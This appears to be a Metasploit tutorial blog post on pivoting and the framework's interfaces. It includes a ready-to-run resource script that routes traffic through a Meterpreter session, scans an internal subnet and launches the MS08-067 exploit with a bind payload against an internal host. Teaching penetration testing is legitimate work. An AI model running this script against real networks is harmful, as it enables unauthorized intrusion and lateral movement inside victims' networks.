There are two aspects of Metasploit I would like to cover today: pivoting, a topic I mentioned in a previous post, and the ways a user interfaces with Metasploit. Pivoting lets an attacker use a compromised system to attack other systems on the same network. For example, if an attacker compromises a web server on a corporate network, the attacker can then use that web server to reach and attack internal systems that are not directly exposed to the outside.
Pivoting is a powerful feature that lets Metasploit penetrate deep into a network. Core Security’s Core Impact and Immunity Inc.’s CANVAS offer it as well. Metasploit’s implementation is not quite as polished as Core Impact’s, but for the price (free) it works well enough. Of all the payloads included in Metasploit, the only one that supports pivoting is Meterpreter: once a Meterpreter session is open, a route to the network behind the compromised host can be added so that other modules send their traffic through that session rather than from the attacker’s own machine.
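The following is an added example, not part of the original post: a Metasploit resource script that sets up the pivot described above and then scans and attacks a host behind it. It assumes that Meterpreter session 1 is already open on the compromised web server, that the internal subnet behind it is 10.10.10.0/24, and that 10.10.10.20 is a hypothetical internal Windows host; all three are assumptions. It is loaded with `resource pivot.rc` from the msfconsole prompt once the session exists, or with `msfconsole -r pivot.rc`.

```text
# pivot.rc: msfconsole resource script (added example; session 1, the subnet
# 10.10.10.0/24 and the host 10.10.10.20 are assumptions).

# Tell the framework that 10.10.10.0/24 is reachable through session 1. From now
# on any module whose target falls in that subnet sends its traffic through the
# Meterpreter session instead of the attacker's own network stack.
route add 10.10.10.0 255.255.255.0 1
route print

# Discover hosts on the internal subnet through the pivot.
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.10.10.1-254
set PORTS 22,80,135,139,445,3389
set THREADS 10
run

# Exploit an internal host through the pivot. A bind payload is used on purpose:
# the internal host cannot reach the attacker directly, so a reverse payload
# would have no way back, whereas a bind listener on the target is reachable
# through the route just added.
use exploit/windows/smb/ms08_067_netapi
set RHOST 10.10.10.20
set PAYLOAD windows/meterpreter/bind_tcp
exploit -j
```

The payload choice is the part that trips people up: reverse payloads are the default almost everywhere, but across a pivot only bind payloads (or a reverse payload pointed at a port forwarded with Meterpreter’s `portfwd`) can complete the connection. `route print` is worth running before the scan to confirm the subnet really is attached to the session you expect.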
Metasploit has four interfaces that can be used when attacking a system: a web interface, a GUI, the msfconsole and the msfcli. For those who are new to Metasploit, the web interface is the simplest way to get comfortable with the layout.
- The Metasploit GUI, shown below, is similar in function to the web interface, though less polished. The attacker can search for and select an exploit, choose a payload, set the options and run the exploit without much knowledge of the underlying commands. The current GUI is no longer supported, but a new GUI ships with Metasploit Express, a commercial product sold by Rapid7.
- The msfconsole is the most powerful, and the most often used, interface to Metasploit. Typically an attacker uses only the basic commands: selecting an exploit, choosing a payload and setting their options. The msfconsole offers many other commands, but they are beyond the scope of this article.
- The msfcli is run from the command line. The attacker passes the exploit, payload and all options as arguments in a single command and executes it; a shell, a Meterpreter session or a VNC window spawns once the exploit succeeds.
In my next installment, I’ll show an exploit I wrote for an application and how it can be leveraged in an attack.